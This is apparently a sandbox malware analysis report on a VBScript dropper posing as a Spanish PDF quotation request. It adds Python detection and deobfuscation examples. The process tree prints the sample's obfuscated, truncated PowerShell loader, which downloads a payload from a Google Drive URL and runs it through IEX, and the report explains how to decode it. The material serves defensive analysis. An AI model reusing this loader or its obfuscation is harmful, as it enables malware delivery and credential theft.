Windows
Analysis Report
SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs
Overview
General Information
Sample name: | SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs |
Original sample name: | SOLICITUD DE COTIZACIN(UG) 03-10-2025pdf.vbs |
Note: the sandbox renamed the file before analysis (report note: "renamed because original name is a hash value"). "#U00d3" and "#U00b7" are escapes for the non-ASCII characters Ó (U+00D3) and the middle dot · (U+00B7), so the name as submitted was "SOLICITUD DE COTIZACIÓN(UG) 03-10-2025·pdf.vbs" ("request for quotation" in Spanish); the middle dot in front of "pdf" makes the .vbs script read like a PDF in a file listing.
Analysis ID: | 1634239 |
MD5: | 82d5a3c2056b0fef301c5ecb9dde8faf |
SHA1: | 25784d9cafad904c2d4e2864eb35002363f63b35 |
SHA256: | 4c6e38470a18fbf67f4fbf231799dfa50937aa6a543a1c4cbe48fc1ea657dcfb |
Tags: | vbs, user-abuse_ch |
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
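Four of the signatures above describe a single execution chain rather than four unrelated findings: "Sigma detected: WScript or CScript Dropper", "Wscript starts Powershell (via cmd or directly)", "Very long command line found" and "Uses ping.exe to check the status of other devices and networks" are all the same script host spawning a long PowerShell one-liner and a ping against a name that can never resolve (the sandbox's "sleep loop"). The Python below is an added example written for this report, not Joe Sandbox's code and not the Sigma project's rules: it applies those four checks to process-creation events constructed from the process tree in this report. The 1000-character command-line threshold and the parent PID 4000 of wscript.exe are assumptions; the report does not state either.

```python
import re
from dataclasses import dataclass

# Example detection logic for this report; not Joe Sandbox's or Sigma's own rules.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LONG_CMDLINE = 1000  # assumed threshold; the report does not state the sandbox's cut-off

# RFC 1123 host name: labels of letters, digits and hyphens.  A name containing an
# underscore (as in the sample's ping target) cannot resolve, so the ping only times out.
HOSTNAME_RE = re.compile(r"^(?!-)(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}$")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name, lower-case
    cmdline: str


def ping_target(cmdline: str) -> str:
    """Last non-option argument of a ping command line ('' if there is none)."""
    args = [a for a in cmdline.split()[1:] if not a.startswith("-")]
    return args[-1] if args else ""


def is_unresolvable_host(name: str) -> bool:
    """True when the name cannot be a valid DNS host name at all."""
    return bool(name) and HOSTNAME_RE.match(name) is None


def find_suspicious_chains(events):
    """Return (rule, pid) pairs for the behaviours the report's signatures describe."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image in SCRIPT_HOSTS:
            if e.image in SHELLS:
                hits.append(("script_host_spawns_shell", e.pid))
            if e.image == "ping.exe":
                hits.append(("script_host_spawns_ping", e.pid))
                if is_unresolvable_host(ping_target(e.cmdline)):
                    hits.append(("ping_sleep_via_unresolvable_host", e.pid))
        if e.image in SHELLS and len(e.cmdline) >= LONG_CMDLINE:
            hits.append(("very_long_shell_cmdline", e.pid))
    return hits


# Events constructed from the report's process tree.  The wscript parent PID (4000) is a
# placeholder, and the PowerShell command line is the real prefix padded with dummy decoder
# calls to stand in for the obfuscated script that the report truncates.
PS_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "echo $Sirupperne; '
    "function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+="
    "$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5} until "
    "(!$Frygtet[$Totalafholdsmndenes])$Utopographer}"
    + "$Junk=Rundingers 'xxxxxxxxxx';" * 60
)

EVENTS = [
    ProcEvent(7496, 4000, "wscript.exe",
              'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\'
              'SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs"'),
    ProcEvent(7624, 7496, "ping.exe", "ping Host_6637.6637.6637.657e"),
    ProcEvent(7656, 7624, "conhost.exe", "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1488, 7496, "powershell.exe", PS_CMDLINE),
]

if __name__ == "__main__":
    for rule, pid in find_suspicious_chains(EVENTS):
        print(f"{rule}: pid {pid}")
```

conhost.exe is deliberately not flagged: it is a child of ping.exe, not of the script host, and carrying it into an alert would fire on every console process. The host-name check is the part worth keeping for triage: a ping whose target cannot be a valid DNS name is a timer, not reconnaissance, whatever the signature title says.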
Process Tree
- System is w10x64
- wscript.exe (PID: 7496, MD5: A47CBE969EA935BDD3AB568BB126BC80) cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs"
  - PING.EXE (PID: 7624, MD5: 2F46799D79D22AC72C241EC0322B011D) cmdline: ping Host_6637.6637.6637.657e
    - conhost.exe (PID: 7656, MD5: 0D698AF330FD17BEE3BF90011D49251D) cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - powershell.exe (PID: 1488) cmdline (re-joined from the report's ten-column line wrapping; spaces that fell exactly on a wrap inside the junk-padded string literals cannot be recovered, and the report cuts the command line off mid-script): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until (!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil B S riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBI
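The PowerShell stage hides every string behind one helper. `Rundingers` walks its argument from index 4 in steps of 5 and returns the characters it lands on (the loop stops when `$Frygtet[$i]` runs off the end of the string, which PowerShell returns as `$null`), and `Exaltative` is `.($Monoprionidian) ($Skriv)`, a call through a variable that itself decodes to `IEX`. The Python below is an added example, not code from the report or from Joe Sandbox: it reimplements the decoder, follows `+=` so that split strings are reassembled, and runs over the literals that survive the report's line wrapping intact (the longer literals lost spaces on the wrap, so only the short ones are reproduced here).

```python
import re

# The decoder name and the string literals in SAMPLE_CMDLINE are copied from the
# wscript -> powershell command line in the process tree above; everything else is
# this example's own code.
LITERAL_RE = re.compile(r"\$(\w+)(\+?=)Rundingers '([^']*)'")


def rundingers(blob: str, start: int = 4, stride: int = 5) -> str:
    """Python equivalent of the sample's decoder:
    $i=4; do { $out += $s[$i]; $i += 5 } until (!$s[$i]); $out
    An out-of-range string index is $null in PowerShell, so the loop ends at the
    end of the string exactly like this slice does."""
    return blob[start::stride]


def recover_assignments(cmdline: str) -> dict:
    """Walk the command line in order, decode every literal handed to the decoder and
    rebuild the variables it is assigned to, honouring '+=' concatenation."""
    values = {}
    for var, op, lit in LITERAL_RE.findall(cmdline):
        prefix = values.get(var, "") if op == "+=" else ""
        values[var] = prefix + rundingers(lit)
    return values


# Fragment of the real command line, re-joined as shown in the process tree.
SAMPLE_CMDLINE = (
    "$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';"
    "$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';"
    "$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';"
    "$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';"
    "$Pyrotoxin=Rundingers ' Gas>';"
    "$Monoprionidian=Rundingers ' debITheoE fo,X';"
)

if __name__ == "__main__":
    for name, value in recover_assignments(SAMPLE_CMDLINE).items():
        print(f"${name} = {value!r}")
```

Run as is, it recovers `$Gylpenes` = NET.webClIeNt, `$Gensidige` = Mozilla/, `$Turf` = Tls12, `$Pyrotoxin` = > and `$Monoprionidian` = IEX. Applying the same stride to the remaining literals in the command line gives the rest of the downloader: `$Gensidige` grows into a Firefox user agent (Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0) with `$Mellemtekst` = User-Agent as the header name; `$Dopingens` is `[net.ServicePointManager]::SecurityProtocol=$Turf`; the first IEX call assigns `$env:appdata+$Thyrostraca` (the drop path \Linieskifte.Rig under %APPDATA%) to a global variable and the second sets `$global:Dominikanske=$Afskrabede.split($Pyrotoxin)`, a '>'-separated URL list of which `$Dominikanske[0]` is then taken; `$Afskrabede` itself decodes to a Google Drive direct-download URL (https://drive.google.com/uc?export=download&id=…). Read the start offset and stride off the decoder function in each sample rather than hard-coding 4 and 5: the variable names, junk text and stride are per-sample.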